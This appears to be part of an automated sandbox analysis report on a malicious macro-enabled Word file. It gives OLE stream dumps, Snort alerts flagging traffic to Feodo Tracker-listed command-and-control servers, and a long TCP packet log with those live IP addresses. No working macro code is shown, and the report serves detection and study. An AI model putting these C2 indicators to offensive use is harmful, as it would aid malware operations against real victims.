Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1060

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	1060
Entropy:	6.71136712122
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . 0 m . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . l . m . ! O f f i c . g
Data Raw:	01 20 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 30 6d d1 61 08 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00

Stream Path: WordDocument, File Type: data, Stream Size: 42542

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	42542
Entropy:	3.55357900009
Base64 Encoded:	False
Data ASCII:	. . . . [ . . . . . . . . . . . . . . . . . . . . . . . l . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 6c a0 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a6 00 00 70 61 21 5c 70 61 21 5c 6c 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/26/21-13:49:03.471903	TCP	2404314	ET CNC Feodo Tracker Reported CnC Server TCP group 8	49169	80	192.168.2.22	184.66.18.83
01/26/21-13:50:01.507455	TCP	2404310	ET CNC Feodo Tracker Reported CnC Server TCP group 6	49172	443	192.168.2.22	167.71.148.58

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 13:48:34.894994974 CET	49167	80	192.168.2.22	35.200.206.198
Jan 26, 2021 13:48:35.085299969 CET	80	49167	35.200.206.198	192.168.2.22
Jan 26, 2021 13:48:35.085406065 CET	49167	80	192.168.2.22	35.200.206.198
Jan 26, 2021 13:48:35.139708996 CET	49167	80	192.168.2.22	35.200.206.198
Jan 26, 2021 13:48:35.330307007 CET	80	49167	35.200.206.198	192.168.2.22
Jan 26, 2021 13:48:36.680448055 CET	80	49167	35.200.206.198	192.168.2.22
Jan 26, 2021 13:48:36.762128115 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:36.883335114 CET	49167	80	192.168.2.22	35.200.206.198
Jan 26, 2021 13:48:36.917046070 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:36.917222023 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:36.917365074 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.052814007 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.120006084 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.120270967 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.120342970 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.120913029 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.121715069 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.121769905 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.201613903 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.201947927 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.202014923 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.202394962 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.202956915 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.203016996 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.269664049 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.269866943 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.270140886 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.270145893 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.270416021 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.270473003 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.328192949 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.328227043 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.328238964 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.328454018 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.392601967 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.393017054 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.393146992 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.393656015 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.394280910 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.394357920 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.489326000 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.489779949 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.489869118 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.490546942 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.491063118 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.491121054 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.597269058 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.597781897 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.597923040 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.598275900 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.598890066 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.598963976 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.721821070 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.722333908 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.722460032 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.723119020 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.723689079 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.723754883 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.792987108 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.793520927 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.793610096 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.794183969 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.794836044 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.794904947 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.839512110 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.839840889 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.840003014 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.840342045 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.840755939 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.840822935 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.890820026 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.891087055 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.891252041 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.891608953 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.892205954 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.892316103 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.931469917 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.931885958 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.931997061 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.932499886 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.933084011 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.933161020 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.974478960 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.974921942 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.975033998 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:37.975481033 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.976170063 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:37.976250887 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.031054974 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.031522989 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.031589031 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.032054901 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.032582998 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.032630920 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.077044964 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.077486992 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.077609062 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.077958107 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.078481913 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.078558922 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.123821020 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.124291897 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.124414921 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.124845982 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.125442982 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.125516891 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.216424942 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.216813087 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.216938972 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.217475891 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.217993021 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.218075991 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.291027069 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.291374922 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.291439056 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.291934013 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.292494059 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.292536974 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.368196011 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.368674040 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.369285107 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.369838953 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.374145985 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.484369040 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.484966993 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.485044003 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.485729933 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.486516953 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.486568928 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.613580942 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.614062071 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.614115000 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.614646912 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.615284920 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.615339994 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.735188961 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.735578060 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.735631943 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.736077070 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.736675978 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.736740112 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.926343918 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.926709890 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.926839113 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:38.927194118 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.927707911 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:38.927819014 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.086466074 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.086896896 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.087090015 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.087368965 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.087821007 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.087914944 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.252011061 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.252273083 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.252378941 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.252629995 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.253021955 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.253134966 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.389220953 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.389595032 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.389697075 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.390153885 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.390665054 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.390772104 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.463712931 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.463897943 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.463959932 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.464246035 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.464710951 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.464795113 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.528734922 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.528964996 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.529064894 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.529438972 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.529828072 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.529903889 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.579986095 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.580318928 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.580374002 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.580766916 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.581248045 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.581298113 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.623693943 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.624120951 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.624213934 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.624762058 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.625487089 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.625552893 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.729460001 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.730056047 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.730113029 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.730834007 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.731592894 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.731647015 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.830416918 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.831002951 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.831067085 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.831841946 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.832572937 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.832660913 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.882671118 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.883389950 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.883457899 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.884072065 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.884816885 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.884862900 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.957714081 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.957794905 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.957844019 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.957962990 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.958635092 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.958734989 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.995598078 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.996275902 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.996385098 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:39.997158051 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.997862101 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:39.997947931 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.036748886 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.036777973 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.036798954 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.036840916 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.037425041 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.037472010 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.113436937 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.114074945 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.114155054 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.114773989 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.115570068 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.115616083 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.205174923 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.205744982 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.205868006 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.206551075 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.209233046 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.209320068 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.336647987 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.337323904 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.337418079 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.338061094 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.338828087 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.338886976 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.423182964 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.423770905 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.423906088 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.424563885 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.425267935 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.425373077 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.501562119 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.502017021 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.502136946 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.502753973 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.503421068 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.503582001 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.567795992 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.568428040 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.568571091 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.569133043 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.569863081 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.569951057 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.611367941 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.611991882 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.612159967 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.612804890 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.613567114 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.613651991 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.649420023 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.650027990 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.650199890 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.650886059 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.651465893 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.651519060 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.684133053 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.684784889 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.684931993 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.685456038 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.686218977 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.686355114 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.715645075 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.716248989 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.716398954 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.716995001 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.717766047 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.717864990 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.770782948 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.771446943 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.771606922 CET	49168	80	192.168.2.22	107.180.12.39
Jan 26, 2021 13:48:40.772238970 CET	80	49168	107.180.12.39	192.168.2.22
Jan 26, 2021 13:48:40.773116112 CET	80	49168	107.180.12.39	192.168.2.22
